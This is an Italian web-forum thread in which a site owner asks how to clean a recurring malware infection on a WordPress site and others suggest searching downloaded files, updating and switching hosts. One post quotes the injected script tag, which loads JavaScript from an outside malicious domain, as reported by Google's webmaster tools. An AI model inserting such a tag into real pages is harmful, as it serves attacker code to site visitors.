Vai al contenuto

All'improvviso un malware sul mio wordpress...


Sbarello

Messaggi raccomandati

Ciao a tutti,

 

oggi è successa una cosa curiosa.

Sono andato sul mio sito con il PC aziendale ( IE8 ) e mi si è visualizzata questa immagine.... sono poi tornato a casa e il problema mi si è presentato anche con Safari, chrome e firefox ...

 

malware.jpg

 

Tenete conto che il sito è così come lo si vede ora da parecchie settimane, non ho cambiato nulla, ergo mi sembra strano che tutto salti fuori così...

Ho cercato su internet dei servizi di scanning dell'URL e tutti mi dicono che non c'è traccia di malware o trojan sul mio sito.

Come risolvo ? se anche son sicuro che sia tutto ok, per uno che visita il mio sito non è bello trovarsi sto msg ....

 

Come posso fare ?

Grazie :)

7/12/2005 - Definitivamente Windows free !! Sbarello ... di nome e di fatto !! - #il mio sito - #tumblr

Link al commento
Condividi su altri siti

Aggiorno con quanto segnalatomi dagli strumenti per webmaster di google...

Mi dice che questi url:

 

http://www.alessandrobosio.com/ 
http://www.alessandrobosio.com/travelportfolio/ 
http://www.alessandrobosio.com/about/ 
http://www.alessandrobosio.com/collaborazionipartner/ 
http://www.alessandrobosio.com/contatti/ 
http://www.alessandrobosio.com/blog/
http://www.alessandrobosio.com/2012/08/30/tibet/
http://www.alessandrobosio.com/2010/03/16/capoverdefogo/

 

sono stati infettati da questo js:

 

<script type="text/javascript" src="http://aaevdg.fr/img/carousel.js">

 

Solo che, dove la trovo la stringa in quegli url su wordpress per poterla rimuovere ?

 

HELP !!   :confused:

7/12/2005 - Definitivamente Windows free !! Sbarello ... di nome e di fatto !! - #il mio sito - #tumblr

Link al commento
Condividi su altri siti

ti hanno semplicemente bucato wordpress.

succede molto spesso, soprattutto a chi non tiene aggiornata la versione di wp e in particolare dei plugin e add-on installati.

 

Fino a che il sito non sarà sicuro, google continuerà ad avvisare i visitatori.

devi prima ripulire i file, e poi aggiornare tutto alle ultime versioni.

che io sappia non ci sono tool di rimozione automatica, ma non usando wordpress potrei sbagliarmi.

 

sul "come si fa" sono certo che cercando un po' in rete scoprirai di avere una numerosa compagnia...

An  a tuesday keeps the doctor away.

proud member of < noi finti professionisti > club - tessera 044

Link al commento
Condividi su altri siti

La cosa più sicura che puoi fare per risolvere il problema è scaricare con un client ftp tutto il tuo sito in locale creare un progetto con eclipse (se già non l'hai fatto) che includa tutti i sorgenti e poi sempre con Eclipse fare una ricerca per quella stringa di testo su tutti i files.

 

Volendo puoi anche fare un cerca e sostituisci su tutti i files tanto si tratta a giudicare da quanto hai postato di un file javascript che viene richiamato dal sito del malware.

 

Fatto tutto questo ricarichi sul tuo sito sostituendo tutti i files con lo stesso nome questi files che hai ripulito. 

Link al commento
Condividi su altri siti

Grazie ad entrambi :)

 

La cosa strana è che wordpress è all'ultima versione, i plugin sono tutti aggiornati.

Ho cercato su google come fare ed ho reinstallato da capo wordpress, cambiato password di wordpress e FTP.

Nonostante ciò il problema rimane ed i file "infetti" sono sempre di più.

 

Cosa curiosa è che con Chrome me lo da infetto, con safari, firefox, ed IE non più ....

 

Non ci capisco una favazza !!!  :confused:

7/12/2005 - Definitivamente Windows free !! Sbarello ... di nome e di fatto !! - #il mio sito - #tumblr

Link al commento
Condividi su altri siti

se sei sicuro che non è più infetto (ma sicuro sicuro) puoi comunicare a Google, tramite strumenti per webmaster, che può provare a ricontrollare il sito per riabilitarlo.

Altrimenti devi aspettare che questo avvenga automaticamente, ma potrebbe volerci qualche giorno.

An  a tuesday keeps the doctor away.

proud member of < noi finti professionisti > club - tessera 044

Link al commento
Condividi su altri siti

Ho già provato con lo strumento ad hoc, ma me lo da sempre infetto...

E' lì che ho visto i file infetti passare da 8 a 11 :(

 

Cmq a scanso di equivoci sto rimettendo su tutto ex novo...

Che purga !!!

 

Solo non capisco che strumento usare per trovare il file dove dovrebbe essere contenuto il codice infetto...

Voglio dire, se ad esempio mi notifica che in alessandrobosio.com c'è la stringa, quale file sull'ftp devo aprire per togliere il codice ?

Con wordpress non è proprio come prendere home.html e lavorarci dentro ...

 

Alvy parlava di uno strumento per cercare/sostituire quella stringa ...

Mi pare che eclipse sia un programma tipo MAMP....

 

Devo installarmi nuovamente in locale il sito per poter agire in quel modo o c'è un altro metodo per trovare la maledetta stringa ?

 

Grazie :)

7/12/2005 - Definitivamente Windows free !! Sbarello ... di nome e di fatto !! - #il mio sito - #tumblr

Link al commento
Condividi su altri siti

Ho già provato con lo strumento ad hoc, ma me lo da sempre infetto...

E' lì che ho visto i file infetti passare da 8 a 11 :(

 

Cmq a scanso di equivoci sto rimettendo su tutto ex novo...

Che purga !!!

 

Solo non capisco che strumento usare per trovare il file dove dovrebbe essere contenuto il codice infetto...

Voglio dire, se ad esempio mi notifica che in alessandrobosio.com c'è la stringa, quale file sull'ftp devo aprire per togliere il codice ?

Con wordpress non è proprio come prendere home.html e lavorarci dentro ...

 

Alvy parlava di uno strumento per cercare/sostituire quella stringa ...

Mi pare che eclipse sia un programma tipo MAMP....

 

Devo installarmi nuovamente in locale il sito per poter agire in quel modo o c'è un altro metodo per trovare la maledetta stringa ?

 

Grazie :)

Come ti ha detto pix basta un qualunque editor di testo con la funzione per cercare all'interno dei files io ti ho nominato eclipse perchè oltre ad essere gratuito è uno dei più usati dagli sviluppatori web.

 

Eclipse non centra niente con mamp sono due cose diverse http://www.eclipse.org

 

Io al posto tuo avrei usato FileZilla https://filezilla-project.org per fare il download di tutto il sito in locale e poi eclipse per fargli controllare tutto il codice cercando in tutti i files del progetto.

 

Ma se non sai usare questi strumenti allora prova con qualcosa di simile o studiali visto che comunque sul web ci sono un mucchio di guide per imparare ad usarli  :ciao:

Link al commento
Condividi su altri siti

Wordpress va sempre tenuto all'ultima versione (ora la 3.5.1) altrimenti è più bucato di una geox

 

direi che il paragone... calza...  :DD

An  a tuesday keeps the doctor away.

proud member of < noi finti professionisti > club - tessera 044

Link al commento
Condividi su altri siti

Era la 3.5.1 ... con tutti plugin aggiornati, tra cui pure uno apposta per la sicurezza ...

 

anyway, lo sto rifacendo da capo e vaff*****o  :confused:

 

Che du maroni !!

7/12/2005 - Definitivamente Windows free !! Sbarello ... di nome e di fatto !! - #il mio sito - #tumblr

Link al commento
Condividi su altri siti

Dunque, sito rifatto da capo, Wordpress agg all'ultima versione, usato DB nuovo di pacca, con nuova password, plugin aggiornati all'ultima versione.

Ho installato Wordfence per la scansione dei files ed ogni sera devo ripulire tutto da capo ...

Questo è quello che mi presenta il plugin:

 

Schermata_2013_06_25_alle_11_34_44.jpg

 

E questo è quello che viene modificato in tutte sti files:

 

Schermata_2013_06_25_alle_11_35_25.jpg

 

Cosa faccio ??  :mad:

HELP !!

7/12/2005 - Definitivamente Windows free !! Sbarello ... di nome e di fatto !! - #il mio sito - #tumblr

Link al commento
Condividi su altri siti

hai cambiato la password dell'ftp dopo il primo attacco?

Il server che ti ospita è sicuro e con le dovute protezioni?

 

comunque il fatto di avere "tutto aggiornato all'ultima versione" è un bene ma non è garanzia di sicurezza al 100%.

Wordpress e relativi plugin sono molto diffusi, hanno ovviamente delle vulnerabilità intrinseche (non esiste un sistema totalmente sicuro) e sono quindi facile preda per chi decide di attaccarti.

 

E' lo scotto da pagare se si vuole "fare un sito" senza averne le competenze tecniche e con pochi (o zero) soldi.

C'è un perché se i professionisti del settore chiedono qualche migliaio di euro per un lavoro fatto bene e all'apparenza semplice.

An  a tuesday keeps the doctor away.

proud member of < noi finti professionisti > club - tessera 044

Link al commento
Condividi su altri siti

Eh, mi sa che a sto punto mi tocca cambiare hosting ... al ticket aperto qualche giorno fà non ho avuto nessuna risposta ...

Se questo è il servizio ...

7/12/2005 - Definitivamente Windows free !! Sbarello ... di nome e di fatto !! - #il mio sito - #tumblr

Link al commento
Condividi su altri siti

... al ticket aperto qualche giorno fà non ho avuto nessuna risposta ...

Se questo è il servizio ...

 

Staranno passando il problema al livello 2.....

 

 

 

 

 

 

Aruba Technical Staff :ghghgh:

 

27751546.jpg

An  a tuesday keeps the doctor away.

proud member of < noi finti professionisti > club - tessera 044

Link al commento
Condividi su altri siti

Stavo guardando Dreamhost ... scusa forse ho preso una cantonata.

Per avere gli stessi servizi che ho su aruba ( che si ok, si è dimostrata inaffidabile ) spenderei circa 100$ l'anno, mentre su aruba 40€ ...

Non mi pare cara se facciamo una mera questione di prezzo ...

 

Dove ho sbagliato ?

7/12/2005 - Definitivamente Windows free !! Sbarello ... di nome e di fatto !! - #il mio sito - #tumblr

Link al commento
Condividi su altri siti

Archiviato

Questa discussione è archiviata e chiusa a future risposte.

×
×
  • Crea Nuovo...